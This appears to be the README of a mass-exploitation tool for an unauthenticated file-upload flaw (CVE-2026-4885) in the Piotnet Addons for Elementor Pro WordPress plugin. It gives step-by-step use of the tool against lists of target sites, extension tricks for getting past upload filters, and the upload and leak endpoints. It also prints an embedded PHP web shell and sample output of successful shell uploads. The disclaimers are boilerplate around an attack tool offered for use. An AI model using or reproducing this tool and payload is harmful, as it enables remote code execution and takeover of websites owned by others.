Share
## https://sploitus.com/exploit?id=4E8D6B62-3ADF-5D83-889E-739A0E3DD7CC
# CVE-2026-4885 – Piotnet Addons for Elementor Pro Mass Exploit

Unauthenticated arbitrary file upload leading to Remote Code Execution (RCE) in **Piotnet Addons for Elementor Pro** ≤ 7.1.70.

This tool is designed for **mass exploitation** – feed it a list of targets, and it will automatically:

- Detect the plugin version (or assume vulnerable if assets are found)
- Perform advanced reconnaissance to extract `post_id`, `form_id`, and the correct upload field name
- Try multiple PHP extensions (`.phtml`, `.php3`, `.php4`, `.phps`, `.pht`, `.php2`) to bypass weak filters
- Upload a **GIF89a‑header PHP shell** (built‑in, no external file needed)
- Leak the uploaded shell URL via `pafe_export_database`
- Verify shell execution (looks for `Logic_Internet` string) and save the URL to `shells.txt`

> **āš ļø Disclaimer**  
> This tool is for educational and authorized security testing only.  
> Unauthorized use against systems you do not own is illegal.
> 
> More Disclaimer You can see the disclaimer on the cover of Jenderal92. You can check it [HERE !!!](https://github.com/Jenderal92/)

---

## Features

- **Python 2.7** compatible (also works with Python 3 if you adjust print/input)
- **Multi‑threaded** – scan and exploit up to 20 targets simultaneously
- **Smart form detection** – parses Piotnet‑specific HTML attributes (`data-pafe-form-builder-field-name`, `data-elementor-id`, etc.)
- **No external shell file** – the PHP payload is embedded in the script
- **Automatic URL scheme** – adds `https://` if missing
- **Extensive path list** – includes 22 common form URLs (`/contact`, `/apply`, `/quote`, `/book-appointment`, …)
- **Leak pattern** – matches both `wp-content/uploads/piotnet-addons-for-elementor/` and direct root paths

---

## Requirements

- Python 2.7 (or Python 3 with minor changes)
- `requests` library

```bash
pip install requests
```

---

Installation

```bash
git clone https://github.com/Jenderal92/CVE-2026-4885.git
cd CVE-2026-4885
```

---

Usage

1. Prepare a target file

Create a file named targets.txt (or any name) with one URL per line:

```
https://example1.com
example2.com
http://vulnerable-site.org
```

2. Run the exploit

```bash
python2 CVE-2026-4885.py targets.txt
```

The script will:

Ā· Show progress for each target
Ā· Save successful shell URLs to shells.txt

Example output

```
[*] Loaded built-in shell (598 bytes)
[*] scanning 25 pages...
[+] found form at https://target.com/contact | post_id=13 form_id=fa2c60e field=file
[*] post_id=13 form_id=fa2c60e field=file
[*] trying .phtml
[+] uploaded .phtml
[+] shell URL: https://target.com/wp-content/uploads/piotnet-addons-for-elementor/xxx-6a11e162a6099.phtml
[+] SHELL UPLOADED -> https://target.com/wp-content/uploads/piotnet-addons-for-elementor/xxx-6a11e162a6099.phtml
```

Command line options (customizable in script)

Variable Description Default
TIMEOUT HTTP request timeout 10 seconds
MAX_THREADS Number of concurrent threads 20
OUTPUT_FILE Where to save successful shell URLs shells.txt
EXT_LIST File extensions to try .phtml, .php3, .php4, .phps, .pht, .php2

You can change these by editing the top of the script.

---

Shell Payload

The built‑in shell is:

```php
GIF89a;
'.'Uname:'.php_uname().''.$cwd = getcwd();
Echo '         '.'';
if (!empty ($_FILES['uploads'])) {
    move_uploaded_file($_FILES['uploads']['tmp_name'],$_FILES['uploads']['name']);
    Echo "alert('upload Done');Uploaded !!!name : ".$_FILES['uploads']['name']."size : ".$_FILES['uploads']['size']."type : ".$_FILES['uploads']['type'];
}
?>
```

Ā· Displays server info, current working directory, and a file upload form.
Ā· Can be replaced with any other PHP code (just change SHELL_CODE in the script).

---

How It Works

1. Version detection
   Ā· Searches homepage for ?ver= in plugin assets.
   Ā· Falls back to checking existence of known CSS/JS files.
2. Reconnaissance
   Ā· Crawls common form pages and all internal links found on the homepage.
   Ā· Extracts post_id, form_id, and the correct file upload field name from Piotnet‑specific HTML attributes.
3. Upload
   Ā· Sends a multipart POST request to wp-admin/admin-ajax.php?action=pafe_ajax_form_builder.
   Ā· Uses a JSON payload that mimics the plugin’s upload mechanism.
   Ā· Tries all extensions in EXT_LIST until one succeeds.
4. Leak
   Ā· Requests pafe_export_database which returns a CSV containing the uploaded file’s full URL.
   Ā· Parses the URL using a regex pattern that matches xxx-{random}.ext.
5. Verification
   Ā· Visits the leaked URL.
   Ā· Checks for the presence of the Logic_Internet string.
   Ā· Saves the URL to shells.txt on success.

---

Troubleshooting

UnicodeEncodeError on Windows

The script already includes a safe_unicode() function that handles non‑ASCII characters. If you still see errors, ensure your terminal supports UTF‑8:

```bash
chcp 65001
```

No form found / All extensions fail

Ā· The target may be patched or not using Piotnet Addons.
Ā· Try increasing TIMEOUT or MAX_THREADS.
Ā· Manually verify that the plugin is actually installed.

Leak fails but upload succeeded

Ā· The pafe_export_database endpoint might be disabled or protected.
Ā· Try accessing /wp-admin/admin-ajax.php?action=pafe_export_database manually in a browser to see if it’s accessible.

---

Legal & Ethical Use

Ā· Only use this tool on systems you have written permission to test.
Ā· The author is not responsible for any misuse or damage caused.
Ā· Respect all applicable laws.